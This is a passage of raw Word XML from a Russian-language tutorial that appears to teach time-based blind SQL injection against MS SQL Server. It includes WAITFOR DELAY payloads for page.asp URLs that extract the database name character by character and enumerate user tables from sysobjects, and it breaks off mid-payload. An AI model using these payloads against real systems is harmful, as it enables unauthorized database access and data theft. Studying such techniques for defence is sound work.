      <w:r w:rsidR="003654EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ы</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> данных для этого пользователя. Пример</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1F8C" w:rsidRPr="001B1F8C"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8A325B" w:rsidRDefault="008A325B" w:rsidP="001B1F8C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://[site]/page.asp?id=1; IF (</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LEN</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(DB_NAM</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E())&gt;k</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WAITFOR DELAY '00:00:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1F8C"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1B1F8C" w:rsidRPr="001B1F8C" w:rsidRDefault="001B1F8C" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="706"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При прав</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>льно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">м значении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мы узнаем длину имени базы данных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1F8C" w:rsidRPr="001B1F8C" w:rsidRDefault="001B1F8C" w:rsidP="001B1F8C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B1F8C" w:rsidRDefault="008A325B" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="706"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A325B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Мы определил</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и, чт</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">о длина имени базы данных равна </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.  Также как и с именем пользователя можно определить все симв</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>олы в имени текущей базы данных</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. П</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ример</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="00673E72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1F8C"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8A325B" w:rsidRDefault="008A325B" w:rsidP="001B1F8C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://[site]/page.asp?id=1; IF (</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LOWER</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SUBSTRING</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>((DB_NAME()),i</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1)))&gt;code</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) WAITFOR </w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DELAY '00:00:10'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1F8C" w:rsidRPr="001B1F8C" w:rsidRDefault="001B1F8C" w:rsidP="001B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Поиском для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в интервале от 1 до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и подстановкой нужного кода символа мы сможем определить имя базы данных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="0027327E" w:rsidRDefault="000606E8" w:rsidP="001B1F8C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B1F8C" w:rsidRPr="00673E72" w:rsidRDefault="00865DCA" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00865DCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее можно выяснить имена всех таблиц, созданных администратором. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для этого сначала необходим</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>о выяснить длину имени таблицы</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, добавив условие</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> что</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> значение в колонке </w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">таблицы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysobjects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> равно символу 'U'.</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Значение в колонке</w:t>
      </w:r>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sidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> показывает, кем была созда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>на таблица. Символ 'U' говорит о том, что эта таблица не системная. Пример</w:t>
      </w:r>
      <w:r w:rsidRPr="00865DCA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B1F8C" w:rsidRPr="00673E72"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0606E8" w:rsidRPr="001B1F8C" w:rsidRDefault="00865DCA" w:rsidP="001B1F8C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://[site]/page.asp?id=1; IF (</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LEN</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP 1 NAME from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysobjects</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xtype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>='U')&gt;</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C" w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="001B1F8C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> WAITFOR DELAY '00:00:10'-- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00865DCA" w:rsidRPr="001B1F8C" w:rsidRDefault="00865DCA" w:rsidP="00865DCA">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865DCA" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>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Далее узнаём имя этой таблицы посимвольно</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007E142F" w:rsidRPr="007E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Определение имён других </w:t>
      </w:r>
      <w:r w:rsidR="007E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>таблиц аналогично. Но для того чтобы исключить из поиска уже найденное имя таблицы необходимо будет добавлять условия, например так:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E142F" w:rsidRPr="008E2951" w:rsidRDefault="007E142F" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E142F" w:rsidRDefault="007E142F" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://[site]/page.asp?id=1; IF (</w:t>
      </w:r>
      <w:r w:rsidR="00187B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LEN</w:t>
      </w:r>
      <w:r w:rsidRPr="007E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="007E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP 1 NAME from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007E142F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysobject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xtype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
